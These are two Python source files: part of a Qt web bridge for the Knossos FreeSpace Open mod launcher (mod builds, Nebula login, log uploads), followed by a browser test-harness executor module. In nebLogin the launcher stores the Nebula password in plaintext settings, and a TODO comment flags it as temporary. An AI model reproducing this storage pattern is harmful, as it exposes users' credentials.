QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Failed to find the mod! Weird...'))
return False
if not mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr("You can't edit \"%s\" because it isn't in dev mode!") % mod.title)
return False
build = build.split('#')
if len(build) != 2:
logging.error('saveModFsoDetails(): build is not correctly formatted! (%s)' % build)
else:
if build[0] == 'custom':
mod.custom_build = build[1]
else:
mod.custom_build = None
try:
exes = mod.get_executables()
except repo.NoExecutablesFound:
# Remove all dependencies on engines first to make sure that we don't create conflicting dependencies
for pkg in mod.packages:
for i, dep in reversed(list(enumerate(pkg.dependencies))):
try:
d = center.installed.query(dep['id'], dep['version'])
except repo.ModNotFound:
# This dependency isn't installed which shouldn't happen since it'll also cause problems
# elsewhere. However, we want to avoid removing a valid dependency just because of a user
# mistake so let's check if the dependency is still available.
try:
d = center.mods.query(dep['id'], dep['version'])
except repo.ModNotFound:
# Still not found. Assume that this dependency doesn't exist anymore and remove it to be safe.
del pkg.dependencies[i]
continue
if d.mtype == 'engine':
del pkg.dependencies[i]
done = False
for pkg in mod.packages:
if pkg.status == 'required':
pkg.dependencies.append({
'id': build[0],
'version': '>=' + build[1]
})
done = True
break
if not done:
QtWidgets.QMessageBox.critical(None, 'Error',
self.tr('Failed to save the selected FSO build. Make sure that you have at least one required' +
' package!'))
return False
else:
old_build = exes[0]['mod']
done = False
for pkg in mod.packages:
for dep in pkg.dependencies:
if dep['id'] == old_build.mid:
dep['id'] = build[0]
dep['version'] = '>=' + build[1]
done = True
break
if done:
break
if not done:
logging.error('Failed to update build dependency for "%s"! WHY?!?! (old_build = %s, new_build = %s)'
% (mod, old_build, build[0]))
mod.cmdline = cmdline
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.main_win.update_mod_list()
return True
@QtCore.Slot(str, str, str, str)
def saveUserFsoDetails(self, mid, version, build, cmdline):
mod = self._get_mod(mid, version)
if mod == -1:
logging.error('Failed find mod "%s" during save!' % mid)
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Failed to find the mod! Weird...'))
return
if build == '':
mod.user_custom_build = None
mod.user_exe = None
else:
build = build.split('#')
if len(build) != 2:
logging.error('saveModFsoDetails(): build is not correctly formatted! (%s)' % build)
else:
if build[0] == 'custom':
mod.user_custom_build = build[1]
mod.user_exe = None
else:
mod.user_custom_build = None
mod.user_exe = build
if cmdline == '#DEFAULT#':
cmdline = None
mod.user_cmdline = cmdline
try:
mod.save_user()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save user.json!'))
return
center.main_win.update_mod_list()
@QtCore.Slot(str, str, list, result=bool)
def saveModFlag(self, mid, version, mod_flag):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return False
mod.mod_flag = mod_flag
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.main_win.update_mod_list()
return True
@QtCore.Slot(str, str, bool)
def startUpload(self, mid, version, private):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return
self._last_upload = tasks.run_task(tasks.UploadTask(mod, private))
@QtCore.Slot()
def cancelUpload(self):
if self._last_upload:
self._last_upload.abort()
self._last_upload = None
@QtCore.Slot(str, str, result=bool)
def nebLogin(self, user, password):
client = nebula.NebulaClient()
try:
result = client.login(user, password)
except Exception:
result = False
logging.exception('Failed to login to Nebula!')
if result:
QtWidgets.QMessageBox.information(None, 'Knossos', 'Login successful!')
# TODO: Figure out a better way for this!
center.settings['neb_user'] = user
center.settings['neb_password'] = password
center.save_settings()
return True
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Login failed.')
@QtCore.Slot(result=bool)
def nebLogout(self):
center.settings['neb_user'] = ''
center.settings['neb_password'] = ''
center.save_settings()
return True
@QtCore.Slot(str, str, str)
def nebRegister(self, user, password, email):
client = nebula.NebulaClient()
try:
result = client.register(user, password, email)
except Exception:
result = False
logging.exception('Failed to register to the Nebula!')
if result:
QtWidgets.QMessageBox.information(None, 'Knossos',
'Registered. Please check your e-mail inbox for your confirmation mail.')
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Registration failed. Please contact ngld.')
@QtCore.Slot(str)
def nebResetPassword(self, user):
client = nebula.NebulaClient()
try:
result = client.reset_password(user)
except Exception:
result = False
logging.exception('Failed to reset Nebula password!')
if result:
QtWidgets.QMessageBox.information(None, 'Knossos', 'You should now receive a mail with a reset link. ' +
'Remember to check your spam folder!')
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Request failed. Please contect ngld.')
@QtCore.Slot(str, str, str, result=bool)
def nebReportMod(self, mid, version, message):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return False
client = nebula.NebulaClient()
try:
client.report_release(mod, message)
except Exception:
logging.exception('Failed to send mod report!')
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Request failed. Please contect ngld.')
return False
else:
QtWidgets.QMessageBox.information(None, 'Knossos',
'Thanks for your report. We will act on it as soon as possible.')
return True
@QtCore.Slot(str, str)
def nebDeleteMod(self, mid, version):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return
fine = False
client = nebula.NebulaClient()
try:
client.delete_release(mod)
fine = True
except nebula.AccessDeniedException:
QtWidgets.QMessageBox.critical(None, 'Knossos', "You can't do that!")
except nebula.InvalidLoginException:
QtWidgets.QMessageBox.critical(None, 'Knossos', "You can't delete this mod from the nebula until you login.")
except nebula.RequestFailedException as exc:
if exc.args[0] == 'not found':
QtWidgets.QMessageBox.information(None, 'Knossos',
"This mod hasn't been uploaded and thus can't be removed from the nebula.")
fine = True
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Request failed. Please contect ngld.')
except Exception:
logging.exception('Failed to send mod report!')
QtWidgets.QMessageBox.critical(None, 'Knossos',
'Request failed. You might have problems connecting to fsnebula.org.')
else:
QtWidgets.QMessageBox.information(None, 'Knossos', 'The release was successfully deleted.')
if fine:
result = QtWidgets.QMessageBox.question(None, 'Knossos', 'Should the local files be deleted?')
if result == QtWidgets.QMessageBox.Yes:
tasks.run_task(tasks.RemoveModFolder(mod))
@QtCore.Slot(str, str)
def removeModFolder(self, mid, version):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return
tasks.run_task(tasks.RemoveModFolder(mod))
@QtCore.Slot(result=str)
def selectCustomBuild(self):
if sys.platform == 'win32':
filter_ = '*.exe'
else:
filter_ = '*'
res = QtWidgets.QFileDialog.getOpenFileNames(None, 'Please select your FSO build', None, filter_)
if res and len(res[0]) > 0:
return res[0][0]
else:
return ''
@QtCore.Slot(str, str, result=str)
def getFsoBuild(self, mid, version):
mod = self._get_mod(mid, version)
if mod.custom_build:
return 'custom#' + mod.custom_build
try:
for item in mod.get_executables():
if item.get('label') is None:
mod = item['mod']
return mod.mid + '#' + str(mod.version)
except repo.NoExecutablesFound:
return ''
except Exception:
logging.exception('Failed to fetch executables!')
return ''
@QtCore.Slot(str, str, result=str)
def getUserBuild(self, mid, version):
mod = self._get_mod(mid, version)
if not isinstance(mod, repo.Mod):
return ''
if mod.user_custom_build:
return 'custom#' + mod.user_custom_build
try:
for item in mod.get_executables(user=True):
if item.get('label') is None:
mod = item['mod']
return mod.mid + '#' + str(mod.version)
except repo.NoExecutablesFound:
return ''
except Exception:
logging.exception('Failed to fetch executables!')
return ''
@QtCore.Slot(str, str, int)
def getFsoCaps(self, mid, version, cb_id):
mod = None
if mid != 'custom':
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return
def helper():
flags = None
exes = []
if not mod:
flags = settings.get_fso_flags(version)
else:
try:
for exe in mod.get_executables():
if not exe.get('label'):
if not flags:
flags = settings.get_fso_flags(exe['file'])
exes.append(os.path.basename(exe['file']))
except repo.NoExecutablesFound:
pass
except Exception:
logging.exception('Failed to fetch FSO flags!')
try:
self.asyncCbFinished.emit(cb_id, json.dumps({
'flags': flags,
'exes': exes
}))
except Exception:
logging.exception('Failed to encode FSO flags!')
Thread(target=helper).start()
@QtCore.Slot(str, str, str, str, result=bool)
def createModVersion(self, mid, version, dest_ver, method):
mod = self._get_mod(mid, version)
if not isinstance(mod, repo.InstalledMod):
logging.error('Mod %s (%s) should have gotten a new version but was not found!' % (mid, version))
QtWidgets.QMessageBox.critical(None, self.tr('Error'),
self.tr("Somehow I lost the mod you're talking about! I'm sorry, this is a bug."))
return False
if not mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr("You can't edit \"%s\" because it isn't in dev mode!") % mod.title)
return False
old_ver = semantic_version.Version(version, partial=True)
try:
dest_ver = semantic_version.Version(dest_ver, partial=True)
except ValueError:
QtWidgets.QMessageBox.critical(None, self.tr('Error'),
self.tr("The specified version number is invalid!"))
return False
except Exception:
logging.exception('Failed to parse new version (%s)!' % dest_ver)
QtWidgets.QMessageBox.critical(None, self.tr('Error'),
self.tr("Failed to parse the new version! This is a bug."))
return False
if old_ver >= dest_ver:
# TODO: Is this check too restrictive?
QtWidgets.QMessageBox.critical(None, self.tr('Error'),
self.tr("The new version has to be higher than the old version!"))
return False
new_mod = mod.copy()
new_mod.version = dest_ver
new_mod.generate_folder()
if os.path.isdir(new_mod.folder):
QtWidgets.QMessageBox.critical(None, self.tr('Error'),
self.tr("The destination folder (%s) already exists! I won't overwrite an existing folder!") % new_mod.folder)
return False
if method == 'copy':
os.mkdir(new_mod.folder)
tasks.run_task(tasks.CopyFolderTask(mod.folder, new_mod.folder))
elif method == 'rename':
try:
util.safe_rename(mod.folder, new_mod.folder)
except OSError:
logging.exception('Failed to rename mod folder for new version!')
QtWidgets.QMessageBox.critical(None, self.tr('Error'),
self.tr('Failed to rename folder "%s"! Make sure that no other program has locked it.') % mod.folder)
return False
try:
center.installed.remove_mod(mod)
except repo.ModNotFound:
logging.exception('The old mod is missing after rename! Did the copy fail?')
elif method == 'empty':
os.mkdir(new_mod.folder)
for pkg in new_mod.packages:
os.mkdir(os.path.join(new_mod.folder, pkg.folder))
try:
new_mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.installed.add_mod(new_mod)
center.main_win.update_mod_list()
return True
@QtCore.Slot(int, int, str)
def testVoice(self, voice, volume, text):
Thread(target=clibs.speak, args=(voice, volume, text)).start()
@QtCore.Slot(str)
def showDescEditor(self, text):
windows.DescriptionEditorWindow(text)
@QtCore.Slot(str, result=str)
def parseIniMod(self, path):
mod = repo.IniMod()
mod.load(path)
return json.dumps(mod.get())
@QtCore.Slot(str, str)
def verifyModIntegrity(self, mid, version):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return
tasks.run_task(tasks.CheckFilesTask(mod.packages, mod))
@QtCore.Slot()
def openScreenshotFolder(self):
path = os.path.join(settings.get_fso_profile_path(), 'screenshots')
if os.path.isdir(path):
QtGui.QDesktopServices.openUrl(QtCore.QUrl.fromLocalFile(path))
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', "The screenshot folder doesn't exist. Try taking screenshots before clicking this button!")
@QtCore.Slot(result=str)
def getDefaultBasePath(self):
if sys.platform == 'win32':
return 'C:\\Games\\FreespaceOpen'
elif sys.platform == 'linux':
return os.path.expanduser('~/games/FreespaceOpen')
elif sys.platform == 'darwin':
return os.path.expanduser('~/Documents/Games/FreespaceOpen')
else:
return ''
@QtCore.Slot()
def openFsoDebugLog(self):
logpath = os.path.join(settings.get_fso_profile_path(), 'data/fs2_open.log')
if not os.path.isfile(logpath):
QtWidgets.QMessageBox.warning(None, 'Knossos',
'Sorry, but I can\'t find the fs2_open.log file.\nDid you run the debug build?')
return
QtGui.QDesktopServices.openUrl(QtCore.QUrl.fromLocalFile(logpath))
@QtCore.Slot(result=str)
def uploadFsoDebugLog(self):
try:
logpath = os.path.join(settings.get_fso_profile_path(), 'data/fs2_open.log')
if not os.path.isfile(logpath):
QtWidgets.QMessageBox.warning(None, 'Knossos',
'Sorry, but I can\'t find the fs2_open.log file.\nDid you run the debug build?')
return ''
st = os.stat(logpath)
if st.st_size > 5 * (1024 ** 2):
QtWidgets.QMessageBox.critical(None, 'Knossos',
"Your log is larger than 5 MB! I unfortunately can't upload logs that big.")
return ''
# Date check
changed_at = datetime.fromtimestamp(st.st_mtime)
age = datetime.now() - changed_at
message = 'The most recent log was generated '
if age.days == 0:
message += 'today'
elif age.days == 1:
message += 'yesterday'
else:
message += '%d days ago' % age.days
message += changed_at.strftime(' at %X')
message += '. Is this when you encountered a problem?'
box = QtWidgets.QMessageBox()
box.setIcon(QtWidgets.QMessageBox.Question)
box.setText(message)
box.setWindowTitle('Knossos')
box.addButton('Yes, upload', QtWidgets.QMessageBox.YesRole)
# no_again = box.addButton('No, run again and generate a new log', QtWidgets.QMessageBox.NoRole)
no_abort = box.addButton('No', QtWidgets.QMessageBox.RejectRole)
box.exec_()
if box.clickedButton() == no_abort:
return
client = nebula.NebulaClient()
with open(logpath, 'r') as stream:
log_link = client.upload_log(stream.read())
except nebula.InvalidLoginException:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'You have to login to upload logs!')
except Exception:
logging.exception('Log upload failed!')
QtWidgets.QMessageBox.critical(None, 'Knossos',
'The log upload failed for an unknown reason! Please make sure your internet connection is fine.')
else:
if log_link:
return log_link
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'The log upload failed for an unknown reason!')
return ''
@QtCore.Slot()
def openKnossosLog(self):
from .launcher import log_path
if not os.path.isfile(log_path):
QtWidgets.QMessageBox.warning(None, 'Knossos',
'Sorry, but I can\'t find the Knossos log. Something went *really* wrong.')
return
QtGui.QDesktopServices.openUrl(QtCore.QUrl.fromLocalFile(log_path))
@QtCore.Slot(result=str)
def uploadKnossosLog(self):
log_link = None
try:
from .launcher import log_path
if not os.path.isfile(log_path):
QtWidgets.QMessageBox.warning(None, 'Knossos',
'Sorry, but I can\'t find the Knossos log. Something went *really* wrong.')
return ''
st = os.stat(log_path)
if st.st_size > 5 * (1024 ** 2):
QtWidgets.QMessageBox.critical(None, 'Knossos',
"Your log is larger than 5 MB! I unfortunately can't upload logs that big.")
return ''
client = nebula.NebulaClient()
with open(log_path, 'r') as stream:
log_link = client.upload_log(stream.read())
except nebula.InvalidLoginException:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'You have to login to upload logs!')
except Exception:
logging.exception('Log upload failed!')
QtWidgets.QMessageBox.critical(None, 'Knossos',
'The log upload failed for an unknown reason! Please make sure your internet connection is fine.')
else:
if log_link:
return log_link
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'The log upload failed for an unknown reason!')
return ''
@QtCore.Slot(str, result=str)
def getGlobalFlags(self, build):
return json.dumps(center.settings['fso_flags'].get(build, {}))
@QtCore.Slot(str, str)
def saveGlobalFlags(self, build, flags):
try:
center.settings['fso_flags'][build] = json.loads(flags)
except Exception:
logging.exception('Failed to decode flags from JS!')
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Failed to decode flags!')
return
center.save_settings()
QtWidgets.QMessageBox.information(None, 'Knossos', 'The settings have been successfully saved.')
@QtCore.Slot(str, str)
def applyGlobalFlagsToAll(self, flags, custom_flags):
try:
flags = json.loads(flags)
except Exception:
logging.exception('Failed to decode flags from JS!')
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Failed to decode flags!')
return
engine_mods = []
for mvs in center.installed.mods.values():
if mvs[0].mtype == 'engine':
engine_mods.extend(mvs)
tasks.run_task(tasks.ApplyEngineFlagsTask(engine_mods, flags, custom_flags))
@QtCore.Slot(str, str, result=str)
def getModCmdline(self, mid, version):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return ''
try:
return ' '.join(runner.apply_global_flags(mod))
except repo.NoExecutablesFound:
return ''
@QtCore.Slot(result=str)
def getEngineBuilds(self):
builds = []
for mvs in center.installed.mods.values():
if mvs[0].mtype == 'engine':
for mod in mvs:
builds.append(mod.get())
return json.dumps(builds)
@QtCore.Slot(str, int)
def getTeamMembers(self, mid, cb_id):
def helper():
try:
client = nebula.NebulaClient()
members = client.get_team_members(mid)
except nebula.InvalidLoginException:
members = {'result': False, 'reason': 'no login'}
except Exception:
logging.exception('Failed to retrieve members!')
members = {'result': False, 'reason': 'exception'}
self.asyncCbFinished.emit(cb_id, json.dumps(members))
Thread(target=helper).start()
@QtCore.Slot(str, str, int)
def updateTeamMembers(self, mid, members, cb_id):
try:
members = json.loads(members)
except json.JSONDecodeError:
logging.exception('Failed to decode members!')
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Failed to decode team members')
self.asyncCbFinished.emit(cb_id, 'false')
return
def helper():
try:
client = nebula.NebulaClient()
helper2(client.update_team_members(mid, members))
except Exception:
logging.exception('Failed to save team members!')
helper2({
'result': False,
'reason': 'exception'
})
@run_in_qt
def helper2(result):
msg = None
reason = result.get('reason', None)
if result['result']:
self.asyncCbFinished.emit(cb_id, 'true')
return
elif reason == 'owners_changed':
msg = "Your changes weren't saved because you aren't permitted to modify the mod Owners!"
elif reason == 'no_owners':
msg = "Your changes couldn't be saved because you need to specify at least one Owner!"
elif reason == 'member_not_found':
msg = 'Your changes could not be saved because the user "%s" was not found.' % result['member']
else:
msg = "Your changes couldn't be saved because an unexpected error ocurred!"
QtWidgets.QMessageBox.critical(None, 'Knossos', msg)
self.asyncCbFinished.emit(cb_id, 'false')
Thread(target=helper).start()
@QtCore.Slot(str)
def reportError(self, msg):
logging.error('JS Error: %s' % msg)
@QtCore.Slot()
def fixBuildSelection(self):
tasks.run_task(tasks.FixUserBuildSelectionTask())
@QtCore.Slot(bool)
def fixImages(self, do_devs):
tasks.run_task(tasks.FixImagesTask(do_devs))
@QtCore.Slot()
def rewriteModJson(self):
tasks.run_task(tasks.RewriteModMetadata(center.installed.get_list()))
@QtCore.Slot()
def showTempHelpPopup(self):
QtWidgets.QMessageBox.information(None, 'Knossos',
'The help system isn\'t implemented yet, but you '
'can ask for help on the <a href="https://discord.gg/qfReB8t">#knossos</a> '
'channel on Discord or on the '
'<a href="https://www.hard-light.net/forums/index.php?topic=94068.0">'
'Knossos release thread</a> on the Hard Light Productions forums.')
@QtCore.Slot(str, result=str)
def setSortType(self, sort_type):
center.sort_type = sort_type
center.main_win.update_mod_list()
return sort_type
if QtWebChannel:
BrowserCtrl = WebBridge
else:
class BrowserCtrl(object):
_view = None
_nam = None
bridge = None
def __init__(self, webView):
self._view = webView
self.bridge = WebBridge()
settings = webView.settings()
settings.setAttribute(QtWebKit.QWebSettings.DeveloperExtrasEnabled, True)
frame = webView.page().mainFrame()
frame.javaScriptWindowObjectCleared.connect(self.insert_bridge)
def load(self):
link = 'qrc:///html/index.html'
self._view.load(QtCore.QUrl(link))
def insert_bridge(self):
frame = self._view.page().mainFrame()
del self.bridge
self.bridge = WebBridge()
frame.addToJavaScriptWindowObject('fs2mod', self.bridge)
|
base.py
|
import hashlib
import httplib
import os
import threading
import traceback
import socket
import urlparse
from abc import ABCMeta, abstractmethod
from ..testrunner import Stop
from protocol import Protocol, BaseProtocolPart
here = os.path.split(__file__)[0]
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def executor_kwargs(test_type, server_config, cache_manager, **kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type == "reftest":
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlparse.urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlparse.urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN"}
def __call__(self, test, result):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def reftest_result_converter(self, test, result):
return (test.result_cls(result["status"], result["message"],
extra=result.get("extra")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TestExecutor(object):
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
def __init__(self, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
@property
def logger(self):
"""StructuredLogger for this executor"""
if self.runner is not None:
return self.runner.logger
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
result = self.result_from_exception(test, e)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol):
return "%s://%s:%s" % (protocol,
self.server_config["browser_host"],
self.server_config["ports"][protocol][0])
def test_url(self, test):
return urlparse.urljoin(self.server_url(test.environment["protocol"]), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "ERROR"
message = unicode(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi):
timeout = test.timeout * self.timeout_multiplier
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.executor.screenshot(test, viewport_size, dpi)
if not success:
return False, data
screenshot = data
hash_value = hashlib.sha1(screenshot).hexdigest()
self.screenshot_cache[key] = (hash_value, None)
rv = (hash_value, screenshot)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def is_pass(self, lhs_hash, rhs_hash, relation):
assert relation in ("==", "!=")
self.message.append("Testing %s %s %s" % (lhs_hash, relation, rhs_hash))
return ((relation == "==" and lhs_hash == rhs_hash) or
(relation == "!=" and lhs_hash != rhs_hash))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
self.message = []
# Depth-first search of reference tree, with the goal
# of reachings a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
while stack:
hashes = [None, None]
screenshots = [None, None]
nodes, relation = stack.pop()
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
if self.is_pass(hashes[0], hashes[1], relation):
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1]) for item in reversed(nodes[1].references)))
else:
# We passed
return {"status":"PASS", "message": None}
# We failed, so construct a failure message
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi)
if success:
screenshots[i] = screenshot
log_data = [{"url": nodes[0].url, "screenshot": screenshots[0]}, relation,
{"url": nodes[1].url, "screenshot": screenshots[1]}]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def retake_screenshot(self, node, viewport_size, dpi):
success, data = self.executor.screenshot(node, viewport_size, dpi)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
flag = self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def execute_script(self, script, async=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WebDriverProtocol(Protocol):
server_cls = None
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive:
self.server.stop()
@property
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = httplib.HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {
"click": ClickAction(self.logger, self.protocol),
"send_keys": SendKeysAction(self.logger, self.protocol)
}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [url] + payload
return True, rv
